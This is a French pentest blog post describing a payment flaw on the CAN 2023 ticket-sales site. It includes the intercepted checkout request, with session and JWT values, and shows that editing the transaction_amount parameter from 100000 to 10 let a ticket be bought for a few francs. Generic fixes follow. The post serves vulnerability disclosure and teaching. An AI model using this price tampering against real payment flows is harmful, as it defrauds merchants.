<!DOCTYPE html>
<html lang="fr">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <link rel="icon" href="/images/zale.jpeg" type="image/x-icon">
        <title>CAN 2023 : La faille qui permettait d&#39;acheter un billet de match à n&#39;importe quel prix - zalepentester | Blog</title><meta name="Description" content="Blog de zalepentester"><meta property="og:title" content="CAN 2023 : La faille qui permettait d&#39;acheter un billet de match à n&#39;importe quel prix" />
<meta property="og:description" content="🧟 La faille qui permettait d&rsquo;acheter un billet de match à n&rsquo;importe quel prix Introduction Dans cet article, nous allons examiner une vulnérabilité découverte sur le site de vente de billets pour la Coupe d&rsquo;Afrique des Nations de 2023 https://can2023-tickets.com/.
Cette faille permet à une personne mal intentionnée d&rsquo;acheter des billets à un prix inférieur à leur valeur réelle. Nous allons démontrer comment exploiter cette vulnérabilité et, en conclusion, donner des recommandations pour prévenir de telles failles à l&rsquo;avenir." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://zalepentester.com/can2023-billet/" /><meta property="og:image" content="https://zalepentester.com/images/1.png" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2024-02-12T07:30:04+00:00" />
<meta property="article:modified_time" content="2024-02-12T07:30:04+00:00" /><meta property="og:site_name" content="zalepentester | Blog" />

<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:image" content="https://zalepentester.com/images/1.png" /><meta name="twitter:title" content="CAN 2023 : La faille qui permettait d&#39;acheter un billet de match à n&#39;importe quel prix"/>
<meta name="twitter:description" content="🧟 La faille qui permettait d&rsquo;acheter un billet de match à n&rsquo;importe quel prix Introduction Dans cet article, nous allons examiner une vulnérabilité découverte sur le site de vente de billets pour la Coupe d&rsquo;Afrique des Nations de 2023 https://can2023-tickets.com/.
Cette faille permet à une personne mal intentionnée d&rsquo;acheter des billets à un prix inférieur à leur valeur réelle. Nous allons démontrer comment exploiter cette vulnérabilité et, en conclusion, donner des recommandations pour prévenir de telles failles à l&rsquo;avenir."/>
<meta name="twitter:site" content="@zalepentester"/>
<meta name="application-name" content="zalepentester | Blog">
<meta name="apple-mobile-web-app-title" content="zalepentester | Blog"><meta name="theme-color" content="#ffffff"><meta name="msapplication-TileColor" content="#da532c"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://zalepentester.com/can2023-billet/" /><link rel="prev" href="https://zalepentester.com/4_vulnerabilites_critiques_cve-2023-46805-cve-2024-21887-cve-2024-21888-et-cve-2024-2189/" /><link rel="stylesheet" href="/css/style.min.css"><link rel="preload" href="/lib/fontawesome-free/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
        <noscript><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"></noscript><link rel="preload" href="/lib/animate/animate.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
        <noscript><link rel="stylesheet" href="/lib/animate/animate.min.css"></noscript><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "CAN 2023 : La faille qui permettait d'acheter un billet de match à n'importe quel prix",
        "inLanguage": "fr",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/zalepentester.com\/can2023-billet\/"
        },"genre": "posts","wordcount":  440 ,
        "url": "https:\/\/zalepentester.com\/can2023-billet\/","datePublished": "2024-02-12T07:30:04+00:00","dateModified": "2024-02-12T07:30:04+00:00","publisher": {
            "@type": "Organization",
            "name": ""},"author": {
                "@type": "Person",
                "name": "Saliou Thiam"
            },"description": ""
    }
    </script></head>
    <body data-header-desktop="fixed" data-header-mobile="auto"><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('dark' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'dark' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="zalepentester | Blog">zalepentester</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="Articles"> Articles </a><a class="menu-item" href="/apropos/apropos" title="A propos"> A propos </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="Rechercher des titres, des contenus..." id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="Chercher">
                            <i class="fas fa-search fa-fw" aria-hidden="true"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="Clair">
                            <i class="fas fa-times-circle fa-fw" aria-hidden="true"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin" aria-hidden="true"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="Changer de Thème">
                    <i class="fas fa-adjust fa-fw" aria-hidden="true"></i>
                </a></div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="zalepentester | Blog">zalepentester</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="Rechercher des titres, des contenus..." id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="Chercher">
                            <i class="fas fa-search fa-fw" aria-hidden="true"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="Clair">
                            <i class="fas fa-times-circle fa-fw" aria-hidden="true"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin" aria-hidden="true"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        Annuler
                    </a>
                </div><a class="menu-item" href="/posts/" title="Articles">Articles</a><a class="menu-item" href="/apropos/apropos" title="A propos">A propos</a><a href="javascript:void(0);" class="menu-item theme-switch" title="Changer de Thème">
                <i class="fas fa-adjust fa-fw" aria-hidden="true"></i>
            </a></div>
    </div>
</header><div class="search-dropdown desktop">
        <div id="search-dropdown-desktop"></div>
    </div>
    <div class="search-dropdown mobile">
        <div id="search-dropdown-mobile"></div>
    </div><main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">Contenu</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animate__animated animate__flipInX">CAN 2023 : La faille qui permettait d'acheter un billet de match à n'importe quel prix</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="https://twitter.com/zalepentester" title="Author" target="_blank" rel="noopener noreffer author" class="author"><i class="fas fa-user-circle fa-fw" aria-hidden="true"></i>Saliou Thiam</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw" aria-hidden="true"></i>&nbsp;<time datetime="12/02/2024">12/02/2024</time>&nbsp;<i class="fas fa-pencil-alt fa-fw" aria-hidden="true"></i>&nbsp;440 mots&nbsp;
                <i class="far fa-clock fa-fw" aria-hidden="true"></i>&nbsp;3 minutes&nbsp;</div>
        </div><div class="featured-image"><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/1.png"
        data-srcset="/images/1.png, /images/1.png 1.5x, /images/1.png 2x"
        data-sizes="auto"
        alt="/images/1.png"
        title="/images/1.png" /></div><div class="details toc" id="toc-static"  data-kept="">
                <div class="details-summary toc-title">
                    <span>Contenu</span>
                    <span><i class="details-icon fas fa-angle-right" aria-hidden="true"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#introduction">Introduction</a></li>
    <li><a href="#détails-de-lexploitation">Détails de l&rsquo;exploitation</a></li>
    <li><a href="#recommandations">Recommandations</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="-la-faille-qui-permettait-dacheter-un-billet-de-match-à-nimporte-quel-prix">🧟 La faille qui permettait d&rsquo;acheter un billet de match à n&rsquo;importe quel prix</h1>
<h2 id="introduction">Introduction</h2>
<p>Dans cet article, nous allons examiner une vulnérabilité découverte sur le site de vente de billets pour la Coupe d&rsquo;Afrique des Nations de 2023 <a href="https://can2023-tickets.com/" target="_blank" rel="noopener noreffer ">https://can2023-tickets.com/</a>.</p>
<p>Cette faille permet à une personne mal intentionnée d&rsquo;acheter des billets à un prix inférieur à leur valeur réelle. Nous allons démontrer comment exploiter cette vulnérabilité et, en conclusion, donner des recommandations pour prévenir de telles failles à l&rsquo;avenir.</p>
<h2 id="détails-de-lexploitation">Détails de l&rsquo;exploitation</h2>
<p>L’exploitation est relativement très simple.
D&rsquo;abord on choisi le ticket qu&rsquo;on veut acheter avec tous les détails à savoir la catégorie, la zone et le siège.
Comment on peut le voir avec la capture ci-dessous, on a tous les éléments nécessaires et le prix du billet.</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/3.png"
        data-srcset="/images/3.png, /images/3.png 1.5x, /images/3.png 2x"
        data-sizes="auto"
        alt="/images/3.png"
        title="Alt text" /></p>
<p>Ici on intercepte la requête qui permet de valider le panier pour effectuer le paiement avec Burpsuite.</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/4.png"
        data-srcset="/images/4.png, /images/4.png 1.5x, /images/4.png 2x"
        data-sizes="auto"
        alt="/images/4.png"
        title="Alt text" /></p>
<p>Contenu de la requête :</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /order HTTP/1.1
</span></span><span class="line"><span class="cl">Host: [redacted.com]
</span></span><span class="line"><span class="cl">Cookie: _session_id=8ababf97261c1f2d274494a5339a5965
</span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
</span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
</span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
</span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate
</span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded
</span></span><span class="line"><span class="cl">Content-Length: 332
</span></span><span class="line"><span class="cl">Origin: https://can2023-tickets.com
</span></span><span class="line"><span class="cl">Referer: https://can2023-tickets.com/
</span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1
</span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document
</span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate
</span></span><span class="line"><span class="cl">Sec-Fetch-Site: cross-site
</span></span><span class="line"><span class="cl">Te: trailers
</span></span><span class="line"><span class="cl">Connection: close
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">operation_token=oDJRLnbY-MHCr-AeQo-FOWf-ves5BdwUW3Rg&amp;order=KK3818AXB&amp;jwt=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJDQUYiLCJvcmRlciI6IktLMzgxOEFYQiIsImV4cCI6MTcwNTc0MzYxNiwiaXNzIjoiR2F0ZXdheSBQYXlNb25leSIsImlhdCI6MTcwNTY1NzIxNiwiYXVkIjoiRS1jb21tZXJjZSJ9.5USzKvP7bc6KKnW7IT92bLdcZnWIQ5pWWU3OVpeuiQw&amp;currency=xof&amp;transaction_amount=100000&amp;payer=
</span></span></code></pre></td></tr></table>
</div>
</div><p>Ici nous avons les données qui sont envoyés à l&rsquo;API de paiement.
Nous avons le Token de l&rsquo;opération, la monnaie utilisée et le prix du billet.
Nous avons remarqué que c&rsquo;est le paramètre &ldquo;transaction_amount&rdquo; qui envoi le prix du billet à l&rsquo;API de paiement.</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">operation_token=oDJRLnbY-MHCr-AeQo-FOWf-ves5BdwUW3Rg&amp;order=KK3818AXB
</span></span><span class="line"><span class="cl">&amp;jwt=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJDQUYiLCJvcmRlciI6IktLMzgxOEFYQiIsImV4cCI6MTcwNTc0MzYxNiwiaXNzIjoiR2F0ZXdheSBQYXlNb25leSIsImlhdCI6MTcwNTY1NzIxNiwiYXVkIjoiRS1jb21tZXJjZSJ9.5USzKvP7bc6KKnW7IT92bLdcZnWIQ5pWWU3OVpeuiQw
</span></span><span class="line"><span class="cl">&amp;currency=xof
</span></span><span class="line"><span class="cl">&amp;transaction_amount=100000
</span></span><span class="line"><span class="cl">&amp;payer=
</span></span></code></pre></td></tr></table>
</div>
</div><p>On peut mettre le prix qu&rsquo;on veut sur ce paramètre pour modifier le prix du billet.</p>
<p>Dans notre exemple, nous allons essayé avec 10 Francs.</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">operation_token=oDJRLnbY-MHCr-AeQo-FOWf-ves5BdwUW3Rg&amp;order=KK3818AXB
</span></span><span class="line"><span class="cl">&amp;jwt=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJDQUYiLCJvcmRlciI6IktLMzgxOEFYQiIsImV4cCI6MTcwNTc0MzYxNiwiaXNzIjoiR2F0ZXdheSBQYXlNb25leSIsImlhdCI6MTcwNTY1NzIxNiwiYXVkIjoiRS1jb21tZXJjZSJ9.5USzKvP7bc6KKnW7IT92bLdcZnWIQ5pWWU3OVpeuiQw
</span></span><span class="line"><span class="cl">&amp;currency=xof
</span></span><span class="line"><span class="cl">&amp;transaction_amount=10
</span></span><span class="line"><span class="cl">&amp;payer=
</span></span></code></pre></td></tr></table>
</div>
</div><p>Et nous remarquons que le changement de prix a été effectué sans problème.</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/6.png"
        data-srcset="/images/6.png, /images/6.png 1.5x, /images/6.png 2x"
        data-sizes="auto"
        alt="/images/6.png"
        title="Alt text" /></p>
<p>Après paiement, les billets seront envoyés par mail.</p>
<h2 id="recommandations">Recommandations</h2>
<ul>
<li>
<p>Mettre en place des tests de pénétration réguliers : Effectuez des tests de pénétration réguliers pour identifier et corriger les vulnérabilités avant qu&rsquo;elles ne soient exploitées.</p>
</li>
<li>
<p>Utiliser une validation d&rsquo;entrée robuste : Assurez-vous que le site Web utilise une validation d&rsquo;entrée robuste pour empêcher les utilisateurs d&rsquo;injecter du code malveillant.</p>
</li>
<li>
<p>Mettre à jour les composants tiers : Maintenez les composants tiers utilisés sur le site Web à jour pour éviter les vulnérabilités connues.</p>
</li>
<li>
<p>Mettre en place une authentification et une autorisation solides : Implémentez un système d&rsquo;authentification et d&rsquo;autorisation robuste pour empêcher les accès non autorisés.</p>
</li>
<li>
<p>Former les développeurs : Formez les développeurs aux meilleures pratiques en matière de sécurité pour éviter les vulnérabilités courantes.</p>
</li>
</ul>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>Mis à jour le 12/02/2024</span>
            </div></div>
        <div class="post-info-line">
            <div class="post-info-md"><span>
                            <a class="link-to-markdown" href="/can2023-billet/index.md" target="_blank"></a>
                        </span></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="Partager sur Twitter" data-sharer="twitter" data-url="https://zalepentester.com/can2023-billet/" data-title="CAN 2023 : La faille qui permettait d&#39;acheter un billet de match à n&#39;importe quel prix" data-via="zalepentester"><i class="fab fa-twitter fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur Facebook" data-sharer="facebook" data-url="https://zalepentester.com/can2023-billet/"><i class="fab fa-facebook-square fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur Linkedin" data-sharer="linkedin" data-url="https://zalepentester.com/can2023-billet/"><i class="fab fa-linkedin fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur WhatsApp" data-sharer="whatsapp" data-url="https://zalepentester.com/can2023-billet/" data-title="CAN 2023 : La faille qui permettait d&#39;acheter un billet de match à n&#39;importe quel prix" data-web><i class="fab fa-whatsapp fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur Hacker News" data-sharer="hackernews" data-url="https://zalepentester.com/can2023-billet/" data-title="CAN 2023 : La faille qui permettait d&#39;acheter un billet de match à n&#39;importe quel prix"><i class="fab fa-hacker-news fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur Line" data-sharer="line" data-url="https://zalepentester.com/can2023-billet/" data-title="CAN 2023 : La faille qui permettait d&#39;acheter un billet de match à n&#39;importe quel prix"><i data-svg-src="/lib/simple-icons/icons/line.min.svg" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur 微博" data-sharer="weibo" data-url="https://zalepentester.com/can2023-billet/" data-title="CAN 2023 : La faille qui permettait d&#39;acheter un billet de match à n&#39;importe quel prix" data-image="/images/1.png"><i class="fab fa-weibo fa-fw" aria-hidden="true"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">Retour</a></span>&nbsp;|&nbsp;<span><a href="/">Accueil</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/4_vulnerabilites_critiques_cve-2023-46805-cve-2024-21887-cve-2024-21888-et-cve-2024-2189/" class="prev" rel="prev" title="Evanti : 4 vulnérabilités critiques (CVE-2023-46805, CVE-2024-21887, CVE-2024-21888 et CVE-2024-2189). Exploitation &amp; Correctifs"><i class="fas fa-angle-left fa-fw" aria-hidden="true"></i>Evanti : 4 vulnérabilités critiques (CVE-2023-46805, CVE-2024-21887, CVE-2024-21888 et CVE-2024-2189). Exploitation & Correctifs</a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line">Tout sur le Pentest</div><div class="footer-line">Propulsé par Saliou Thiam
                </div><div class="footer-line" itemscope itemtype="http://schema.org/CreativeWork"><i class="far fa-copyright fa-fw" aria-hidden="true"></i><span itemprop="copyrightYear">2024</span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="Retour en Haut">
                <i class="fas fa-arrow-up fa-fw" aria-hidden="true"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="Afficher les Commentaires">
                <i class="fas fa-comment fa-fw" aria-hidden="true"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/katex/katex.min.css"><link rel="stylesheet" href="/lib/cookieconsent/cookieconsent.min.css"><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/lunr/lunr.min.js"></script><script type="text/javascript" src="/lib/lunr/lunr.stemmer.support.min.js"></script><script type="text/javascript" src="/lib/lunr/lunr.fr.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript" src="/lib/katex/katex.min.js"></script><script type="text/javascript" src="/lib/katex/contrib/auto-render.min.js"></script><script type="text/javascript" src="/lib/katex/contrib/copy-tex.min.js"></script><script type="text/javascript" src="/lib/katex/contrib/mhchem.min.js"></script><script type="text/javascript" src="/lib/cookieconsent/cookieconsent.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"Copier dans le presse-papiers","maxShownLines":50},"comment":{},"cookieconsent":{"content":{"dismiss":"Se mettre d'accord","link":"Apprendre encore plus","message":"Ce site Web utilise des Cookies pour améliorer votre expérience."},"enable":true,"palette":{"button":{"background":"#f0f0f0"},"popup":{"background":"#1aa3ff"}},"theme":"edgeless"},"math":{"delimiters":[{"display":true,"left":"$$","right":"$$"},{"display":true,"left":"\\[","right":"\\]"},{"display":true,"left":"\\begin{equation}","right":"\\end{equation}"},{"display":true,"left":"\\begin{equation*}","right":"\\end{equation*}"},{"display":true,"left":"\\begin{align}","right":"\\end{align}"},{"display":true,"left":"\\begin{align*}","right":"\\end{align*}"},{"display":true,"left":"\\begin{alignat}","right":"\\end{alignat}"},{"display":true,"left":"\\begin{alignat*}","right":"\\end{alignat*}"},{"display":true,"left":"\\begin{gather}","right":"\\end{gather}"},{"display":true,"left":"\\begin{CD}","right":"\\end{CD}"},{"display":false,"left":"$","right":"$"},{"display":false,"left":"\\(","right":"\\)"}],"strict":false},"search":{"highlightTag":"em","lunrIndexURL":"/index.json","lunrLanguageCode":"fr","maxResultLength":10,"noResultsFound":"Aucun résultat trouvé","snippetLength":30,"type":"lunr"}};</script><script type="text/javascript" src="/js/theme.min.js"></script><script type="text/javascript">
            window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());
            gtag('config', 'G-0VHR6YTLQZ', { 'anonymize_ip': true });
        </script><script type="text/javascript" src="https://www.googletagmanager.com/gtag/js?id=G-0VHR6YTLQZ" async></script></body>
</html>
